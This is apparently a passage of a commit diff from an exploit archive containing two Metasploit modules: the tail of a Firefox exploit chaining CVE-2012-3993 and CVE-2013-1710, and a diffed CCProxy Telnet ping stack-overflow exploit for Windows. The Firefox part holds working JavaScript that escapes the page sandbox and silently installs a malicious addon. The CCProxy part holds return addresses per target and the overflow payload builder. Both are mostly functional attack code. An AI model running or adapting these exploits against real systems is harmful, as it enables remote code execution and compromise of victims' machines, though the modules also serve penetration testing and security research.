another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
into the context's private scope. Since the window does not have a chrome:// URL,
the insecure parts of Components.classes are not available, so instead the AddonManager
API is invoked to silently install a malicious plugin.
},
'License' => MSF_LICENSE,
'Author' => [
'Mariusz Mlynski', # discovered CVE-2012-3993
'moz_bug_r_a4', # discovered CVE-2013-1710
'joev' # metasploit module
],
'DisclosureDate' => "Aug 6 2013",
'References' => [
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
['OSVDB', '86111'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23)
['OSVDB', '96019']
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
], self.class)
end
def on_request_exploit(cli, request, target_info)
if request.uri.match(/\.xpi$/i)
print_status("Sending the malicious addon")
send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
else
print_status("Sending HTML")
send_response_html(cli, generate_html(target_info))
end
end
def generate_html(target_info)
injection = if target_info[:ua_ver].to_i == 15
"Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
else
"p2.constructor.defineProperty(obj,key,{get:runme});"
end
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
if (!window.done){
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
</div>
<script>
try{InstallTrigger.install(0)}catch(e){p=e;};
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
p2.__exposedProps__={
constructor:'rw',
prototype:'rw',
defineProperty:'rw',
__exposedProps__:'rw'
};
var s = document.querySelector('#payload').innerHTML;
var q = false;
var register = function(obj,key) {
var runme = function(){
if (q) return;
q = true;
window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
};
try {
#{injection}
} catch (e) {}
};
for (var i in window) register(window, i);
for (var i in document) register(document, i);
</script>
</body>
</html>
|
end
end

105
platforms/windows/remote/4360.rb
View file

@ -1,110 +1,82 @@
##
# $Id$
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
The stack is overwritten when sending an overly long address to the 'ping' command.
This module exploits the YoungZSoft CCProxy <= v6.2 suite
Telnet service. The stack is overwritten when sending an overly
long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'BID', '11666 ' ],
[ 'CVE', '2004-2416' ],
[ 'MIL', '621' ],
[ 'OSVDB', '11593' ],
],
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d",
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[
'Windows 2000 Pro All - English',
{
'Ret' => 0x75023411, # call esi ws2help.dll
}
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
[
'Windows 2000 Pro All - Italian',
{
'Ret' => 0x74fd2b81, # call esi ws2help.dll
}
],
[
'Windows 2000 Pro All - French',
{
'Ret' => 0x74fa2b22, # call esi ws2help.dll
}
],
[
'Windows XP SP0/1 - English',
{
'Ret' => 0x71aa1a97, # call esi ws2help.dll
}
],
[
'Windows XP SP2 - English',
{
'Ret' => 0x71aa1b22, # call esi ws2help.dll
}
],
],
'DisclosureDate' => 'Nov 11 2004'))
register_options(
register_options(
[
Opt::RPORT(23),
], self.class)
end
def autofilter
false
end
def check
def check
connect
banner = sock.get_once(-1,3)
disconnect
if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
@ -113,6 +85,3 @@ class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
end
end
end
# milw0rm.com [2007-09-03]